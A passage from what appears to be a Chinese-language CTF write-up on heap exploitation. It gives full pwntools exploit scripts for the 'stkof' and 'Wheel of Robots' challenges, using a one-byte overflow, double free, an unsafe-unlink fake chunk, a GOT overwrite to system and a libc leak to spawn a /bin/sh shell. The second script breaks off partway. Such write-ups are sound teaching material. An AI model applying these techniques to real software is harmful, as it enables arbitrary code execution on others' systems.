<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">system_offset=<span class="number">0x45390</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(strlen_GOT))<span class="comment">#index 2-&gt;strlen_GOT address</span></span><br><span class="line">fill_chunk(<span class="number">2</span>,<span class="number">8</span>,p64(libc_base+system_offset))<span class="comment">#set strlen_GOT -&gt; system</span></span><br><span class="line">fill_chunk(<span class="number">3</span>,len(<span class="string">'/bin/sh'</span>),<span class="string">'/bin/sh'</span>)</span><br><span class="line">todo(<span class="number">3</span>)</span><br></pre></td></tr></table></figure>

<h2 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'./stkof'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span>, stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">ub_offset = <span class="number">0x3c4b30</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="comment">#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new</span><span class="params">(size)</span>:</span></span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'1'</span>)</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fill_chunk</span><span class="params">(index,size,content)</span>:</span></span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'2'</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line">	p.sendline(str(size))</span><br><span class="line">	p.send(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">Free</span><span class="params">(index)</span>:</span></span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'3'</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">todo</span><span class="params">(index)</span>:</span></span><br><span class="line">	sleep(<span class="number">0.1</span>)</span><br><span class="line">	p.sendline(<span class="string">'4'</span>)</span><br><span class="line">	p.sendline(str(index))</span><br><span class="line"></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 1 can't use</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line"></span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 2</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 3</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 4</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 5 unlink chunk</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 6 chunk to free</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">new(<span class="number">0x80</span>)<span class="comment">#index 7 Avoid merging</span></span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line"></span><br><span class="line">chunk5_address=<span class="number">0x602168</span></span><br><span class="line">fake_chunk  = p64(<span class="number">0</span>)+p64(<span class="number">0x81</span>)<span class="comment">#fake chunk head</span></span><br><span class="line">fake_chunk += p64(chunk5_address<span class="number">-0x18</span>)+p64(chunk5_address<span class="number">-0x10</span>)<span class="comment">#fake fd/bk</span></span><br><span class="line">fake_chunk += <span class="string">'\x00'</span>*(<span class="number">0x80</span>-len(fake_chunk))</span><br><span class="line">fake_chunk += p64(<span class="number">0x80</span>)+<span class="string">'\x90'</span><span class="comment">#fake prev_size,prev_inuse</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,len(fake_chunk),fake_chunk)</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line"></span><br><span class="line">Free(<span class="number">6</span>)</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">strlen_GOT=<span class="number">0x602030</span></span><br><span class="line">puts_GOT=<span class="number">0x602020</span></span><br><span class="line">puts_plt=<span class="number">0x400760</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(strlen_GOT))</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">fill_chunk(<span class="number">2</span>,<span class="number">8</span>,p64(puts_plt))</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(puts_GOT))</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">gdb.attach(p,<span class="string">'b *0x400C1C'</span>)</span><br><span class="line"></span><br><span class="line">todo(<span class="number">2</span>)</span><br><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x6f690</span></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'libc_base:'</span>+hex(libc_base) + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line">system_offset=<span class="number">0x45390</span></span><br><span class="line">fill_chunk(<span class="number">5</span>,<span class="number">8</span>,p64(strlen_GOT))</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">fill_chunk(<span class="number">2</span>,<span class="number">8</span>,p64(libc_base+system_offset))</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">fill_chunk(<span class="number">3</span>,len(<span class="string">'/bin/sh'</span>),<span class="string">'/bin/sh'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'OK\n'</span>)</span><br><span class="line">todo(<span class="number">3</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><em>ps:ctf-wiki上面是直接修改 <code>atoi@got</code> 为 system 函数地址，再次调用时，输入 /bin/sh 地址，这里可以用作以后exploit的参考</em></p>
<h1 id="Wheel-of-Robots"><a href="#Wheel-of-Robots" class="headerlink" title="Wheel of Robots"></a>Wheel of Robots</h1><h2 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h2><p>主菜单一共有四个选择，在进行选择之前用/dev/random读取随机数来当做srand种子</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573062290.png" alt="1580573062290"></p>
<h3 id="add："><a href="#add：" class="headerlink" title="add："></a>add：</h3><h4 id="输入选择部分"><a href="#输入选择部分" class="headerlink" title="输入选择部分"></a>输入选择部分</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573416563.png" alt="1580573416563"></p>
<p>提供一个机器人选择菜单，然后对全局变量choic输入5B，此处存在一个<strong>1 Byte overflow</strong>，可以覆盖到<code>Bender</code>。</p>
<p>numofrobot不能大于2（初始为0）</p>
<h4 id="Tinny-Tim-对应1-："><a href="#Tinny-Tim-对应1-：" class="headerlink" title="Tinny_Tim(对应1)："></a>Tinny_Tim(对应1)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573549034.png" alt="1580573549034"></p>
<p>Tinny Tim是一个0x14大小的fast chunk，用calloc分配。<code>Tinny_Tim</code>记录这个机器人是否存在，<code>Tinny_Tim_ptr</code>记录堆指针，calloc之后将chunk data部分填充为Tinny Tim字符串</p>
<h4 id="Bender-对应2-："><a href="#Bender-对应2-：" class="headerlink" title="Bender(对应2)："></a>Bender(对应2)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580573753819.png" alt="1580573753819"></p>
<p>Bender是一个大小不固定的fast chunk ，其大小根据用户输入<code>Bender_intelligence</code>决定，最大为0x3c，calloc分配，<code>Bender</code>记录机器人是否存在，<code>Bender_ptr</code>记录堆指针，calloc之后对chunk data部分填充</p>
<h4 id="Devil-对应3-："><a href="#Devil-对应3-：" class="headerlink" title="Devil(对应3)："></a>Devil(对应3)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574045235.png" alt="1580574045235"></p>
<p>Devil是一个大小不固定的chunk，大小根据用户输入的<code>Devil_cruelty</code>决定，最大为0x7bc，calloc分配，<code>Devil</code>记录机器人是否存在，<code>Devil_ptr</code>记录堆指针，calloc之后对chunk data填充</p>
<h4 id="Chain-smoker-对应4-："><a href="#Chain-smoker-对应4-：" class="headerlink" title="Chain_smoker(对应4)："></a>Chain_smoker(对应4)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574275281.png" alt="1580574275281"></p>
<p>Chain_smoker是一个大小固定的chunk（0xFA0），calloc分配，<code>Chain_smoker</code>记录机器人是否存在，<code>Chain_smoker_ptr</code>记录堆指针，calloc之后对chunk data填充</p>
<h4 id="Billionaire-Bot-对应5-："><a href="#Billionaire-Bot-对应5-：" class="headerlink" title="Billionaire_Bot(对应5)："></a>Billionaire_Bot(对应5)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574445414.png" alt="1580574445414"></p>
<p>Billionaire_Bot是一个固定大小的chunk（0x9C40），calloc分配，<code>Billionaire_Bot</code>记录是否存在，<code>Billionaire_Bot_ptr</code>记录堆指针，calloc之后对chunk data填充</p>
<h4 id="Destructor-对应6-："><a href="#Destructor-对应6-：" class="headerlink" title="Destructor(对应6)："></a>Destructor(对应6)：</h4><p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580574577079.png" alt="1580574577079"></p>
<p>Destructor是一个大小不固定的chunk，大小根据用户输入的<code>Destructor_powerful</code>决定，calloc分配，<code>Destructor</code>记录机器人是否存在，<code>Destructor_ptr</code>记录堆指针，calloc之后对chunk data填充</p>
<h4 id="total："><a href="#total：" class="headerlink" title="total："></a><em>total：</em></h4><p>这里再记一下64位不同chunk的size范围（fast chunk：0x20~0x80，small chunk：&lt;0x400，large chunk &gt;=0x400）</p>
<ol>
<li>Tinny Tim：大小固定fast chunk 0x14</li>
<li>Bender：大小不固定fast chunk 0x14~0x3c</li>
<li>Robot Devil：大小不固定chunk，可以是fast chunk，small chunk，large chunk，max：0x7bc</li>
<li>Chain Smoker：large chunk 0xFA0</li>
<li>Billionaire Bot：large chunk 0x9C40</li>
<li>Destructor：可以是fast chunk，small chunk，large chunk</li>
</ol>
<h3 id="delete："><a href="#delete：" class="headerlink" title="delete："></a>delete：</h3><p>输入部分没有add的 overflow（有了add的分析基础接下来的分析简单一点）</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580575014595.png" alt="1580575014595"></p>
<p>全都是相同的操作，判断各记录，将对应ptr free掉之后把记录清零，然后numofrobot–</p>
<h3 id="change："><a href="#change：" class="headerlink" title="change："></a>change：</h3><p>change 的输入也是正常的</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580575136615.png" alt="1580575136615"></p>
<p>同样都是一个操作，检查记录，将对应chunk的data段renew，输入大小为申请时的大小</p>
<h3 id="startwheel："><a href="#startwheel：" class="headerlink" title="startwheel："></a>startwheel：</h3><p>当有2个robot时，产生0~6的随机数，随机选择输出一个chunk的内容</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580639554736.png" alt="1580639554736"></p>
<h2 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit:"></a>Exploit:</h2><p><em>这个方法是我自己写，没有看ctf-wiki的WP时候摸索出来的方法，并没有用到startwheel函数</em></p>
<p>原ctf-wiki链接：<a href="https://wiki.x10sec.org/pwn/heap/unlink/#2017-insomnihack-wheelofrobots" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/heap/unlink/#2017-insomnihack-wheelofrobots</a></p>
<p>add一个Bender（fast chunk），add一个Robot Devil（small chunk，这个用来Avoid merging&amp;trigger unlink），然后delete掉Bender，接着malloc一个Chain Smoker（large chunk），trigger <code>malloc_consolidate</code>，将fast chunk放入smallbins，然后通过1 Byte overflow更改<code>Bender</code>为1，再次delete，构成double free。（wiki上面是利用fastbin attack修改记录的chunk大小，change时构成overflow）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#注释末尾的数字表示numofrobot</span></span><br><span class="line">add(<span class="number">2</span>,intelligence=<span class="number">2</span>)<span class="comment">#Add Bender						1</span></span><br><span class="line">add(<span class="number">3</span>,cruelty=<span class="number">0x20</span>)<span class="comment">#Add Robot Devil	small chunk				2</span></span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#Add Bender to fastbins						1</span></span><br><span class="line">add(<span class="number">4</span>)<span class="comment">#Add large chunk(Chain_smoker) trigger malloc_consolidate	   		2</span></span><br><span class="line">overflow_Bender_to(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#Delete Bender again							1</span></span><br><span class="line"><span class="comment">#double free now</span></span><br></pre></td></tr></table></figure>



<p><em>double free和malloc_consolidate的联合利用在之前SleepyHolder中已经写过了所以这里写简单一些</em></p>
<p>再add一个Bender，change时构造一个fake chunk，然后delete Robot Devil，trigger unlink，结束后<code>Bender_ptr</code>会指向&amp;Bender_ptr-0x18处，如图：</p>
<p><img src="/2020/02/02/how2heap-unsafe-unlink-stkof%E3%80%81Wheel-of-Robots/1580640134364.png" alt="1580640134364"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">Bender_ptr=<span class="number">0x6030F0</span></span><br><span class="line">add(<span class="number">2</span>,intelligence=<span class="number">2</span>)<span class="comment">#Add Bender 						2</span></span><br><span class="line">fake_chunk  = p64(<span class="number">0</span>)+p64(<span class="number">0x21</span>)<span class="comment">#fake chunk head</span></span><br><span class="line">fake_chunk += p64(Bender_ptr<span class="number">-0x18</span>)+p64(Bender_ptr<span class="number">-0x10</span>)<span class="comment">#fake fd/bk</span></span><br><span class="line">fake_chunk += <span class="string">'\x00'</span>*(<span class="number">0x20</span>-len(fake_chunk))</span><br><span class="line">fake_chunk += p64(<span class="number">0x20</span>)<span class="comment">#fake prev_size</span></span><br><span class="line">change(<span class="number">2</span>,fake_chunk)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#set Bender to fastbin							1</span></span><br><span class="line">add(<span class="number">6</span>,powerful=<span class="number">0x20</span>)<span class="comment">#Add Destructor small chunk     			  	2</span></span><br><span class="line">delete(<span class="number">3</span>)<span class="comment">#trigger unlink			 				1</span></span><br></pre></td></tr></table></figure>

<p>这里再trigger之前为什么要delete Bender还有add Destructor主要是为了后面的利用，这一块是我在写后面利用的时候回来补的(主要是delete3之后再来delete的时候会报错)，可以先不用管，这里delete Bender到fastbins里面之后也并没有影响fake_chunk，其prev_size字段本来就是0</p>
<p>因为我们之前add了Chain_smoker，所以可以用这个Chain_smoker_ptr来修改GOT表，具体为先修改Chain_smoker_ptr为&amp;free_GOT，然后change为&amp;puts_plt，再将Chain_smoker_ptr设置成puts_GOT，从而delete Chain_smoker时可以调用puts(&amp;puts_GOT)，计算出libc偏移</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">overflow_Bender_to(<span class="number">1</span>)</span><br><span class="line">free_GOT=<span class="number">0x603018</span></span><br><span class="line">puts_plt=<span class="number">0x400830</span></span><br><span class="line">puts_GOT=<span class="number">0x603028</span></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(free_GOT))<span class="comment">#change Chain_smoker_ptr to &amp;free_GOT by Bender</span></span><br><span class="line">change(<span class="number">4</span>,p64(puts_plt))<span class="comment">#*free_GOT to &amp;puts_plt by Chain_smoker_ptr</span></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(puts_GOT))<span class="comment">#change Chain_smoker_ptr to &amp;puts_GOT</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">delete(<span class="number">4</span>)<span class="comment">#puts(&amp;puts_GOT)							0</span></span><br></pre></td></tr></table></figure>



<p>这个时候我发现，delete Chain_smoker之后，由于<code>Chain_smoker</code>记录会变成0，也就是说通过这个指针来实现Arbitrary write不行了（Bender可以重复利用是因为存在一个溢出），但是这里还有一个<code>Destructor_ptr</code>，所以就有了前面delete Bender然后add Destructor的操作，利用<code>Chain_smoker_ptr</code>实现地址泄露之后，再用<code>Destructor_ptr</code>来实现getshell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">libc_base=my_u64(p.recv(<span class="number">6</span>))<span class="number">-0x6f690</span></span><br><span class="line">system_address=libc_base+<span class="number">0x45390</span></span><br><span class="line"></span><br><span class="line">change(<span class="number">2</span>,p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(free_GOT))<span class="comment">#change Destructor_ptr to &amp;free_GOT by Bender</span></span><br><span class="line">change(<span class="number">6</span>,p64(system_address))<span class="comment">#*free_GOT to system_address by Destructor_ptr</span></span><br><span class="line">change(<span class="number">2</span>,<span class="string">'/bin/sh\x00'</span>)<span class="comment"># *Bender_ptr = '/bin/sh\x00'</span></span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#system(Bender_ptr)-&gt;system("/bin/sh")</span></span><br></pre></td></tr></table></figure>

<h2 id="完整EXP-1"><a href="#完整EXP-1" class="headerlink" title="完整EXP"></a>完整EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> __future__ <span class="keyword">import</span> print_function</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">binary = <span class="string">'wheelofrobots'</span>	<span class="comment">#binary's name here</span></span><br><span class="line">context.binary = binary		<span class="comment">#context here</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">pty = process.PTY</span><br><span class="line">p = process(binary, aslr = <span class="number">1</span> , stdin=pty, stdout=pty)	<span class="comment">#process option here</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Host =</span></span><br><span class="line"><span class="string">Port =</span></span><br><span class="line"><span class="string">p = remote(Host,Port)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">my_u64 = <span class="keyword">lambda</span> x: u64(x.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line">ub_offset = <span class="number">0x3c4b30</span></span><br><span class="line">codebase = <span class="number">0x555555554000</span></span><br><span class="line"><span class="comment">#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># todo here</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">overflow_Bender_to</span><span class="params">(num)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	p.send(<span class="string">'9999'</span>+str(num))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(choice,intelligence=<span class="number">0</span>,cruelty=<span class="number">0</span>,powerful=<span class="number">0</span>)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	p.send(str(choice))</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> choice == <span class="number">2</span>:</span><br><span class="line">		p.recvuntil(<span class="string">'intelligence: '</span>)</span><br><span class="line">		p.send(str(intelligence))</span><br><span class="line">	<span class="keyword">elif</span> choice == <span class="number">3</span>:</span><br><span class="line">		p.recvuntil(<span class="string">'cruelty: '</span>)</span><br><span class="line">		p.send(str(cruelty))</span><br><span class="line">	<span class="keyword">elif</span> choice == <span class="number">6</span>:</span><br><span class="line">		p.recvuntil(<span class="string">'powerful: '</span>)</span><br><span class="line">		p.send(str(powerful))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(choice)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'2'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	p.send(str(choice))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change</span><span class="params">(choice,content)</span>:</span></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice : '</span>)</span><br><span class="line">	p.send(<span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">'Your choice :'</span>)</span><br><span class="line">	p.send(str(choice))</span><br><span class="line"></span><br><span class="line">	p.recvuntil(<span class="string">"Robot's name: "</span>)</span><br><span class="line">	p.send(content)</span><br><span class="line"></span><br><span class="line">add(<span class="number">2</span>,intelligence=<span class="number">2</span>)<span class="comment">#Add Bender						1</span></span><br><span class="line">add(<span class="number">3</span>,cruelty=<span class="number">0x20</span>)<span class="comment">#Add Robot Devil	small chunk				2</span></span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#Add Bender to fastbins						1</span></span><br><span class="line">add(<span class="number">4</span>)<span class="comment">#Add large chunk(Chain_smoker) trigger malloc_consolidate	2</span></span><br><span class="line">overflow_Bender_to(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">2</span>)<span class="comment">#Delete Bender again							1</span></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">"\033[1;36m"</span> + <span class="string">'Double freed now'</span> + <span class="string">"\033[0m"</span>)</span><br><span class="line"></span><br><span class="line">Bender_ptr=<span class="number">0x6030F0</span></span><br><span class="line">add(<span class="number">2</span>,intelligence=<span class="number">2</span>)<span class="comment">#Add Bender 						2</span></span><br><span class="line">fake_chunk  = p64(<span class="number">0</span>)+p64(<span class="number">0x21</span>)<span class="comment">#fake chunk head</span></span><br><span class="line">fake_chunk += p64(Bender_ptr<span class="number">-0x18</span>)+p64(Bender_ptr<span class="number">-0x10</span>)<span class="comment">#fake fd/bk</span></span><br><span class="line">fake_chunk += <span class="string">'\x00'</span>*(<span class="number">0x20</span>-len(fake_chunk))</span><br><span class="line">fake_chunk += p64(<span class="number">0x20</span>)<span class="comment">#fake prev_size</span></span><br><span class="line">change(<span class="number">2</span>,fake_chunk)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p,'b *0x4012C0')</span></span><br><span class="line">delete(<span class="number">2</span>)<span 